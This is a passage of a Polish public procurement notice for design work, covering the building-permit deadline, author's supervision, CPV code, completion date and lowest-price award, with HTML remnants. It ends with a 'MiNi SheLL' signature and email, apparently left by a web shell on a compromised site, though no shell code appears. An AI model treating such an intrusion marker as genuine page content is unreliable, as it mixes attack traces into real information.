Złożenie dokumentacji celem uzyskania pozwolenia na budowę. 
Zamawiający ze względu na krótki termin realizacji zamówienia dopuszcza uzyskanie pozwolenia na budowę do dnia 30.10.2012r.
Wykonawca zobowiązany jest do sprawowania nadzoru autorskiego w trakcie 
realizacji robót objętych Projektem technicznym. Oferta ma uwzględniać koszt nadzoru autorskiego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com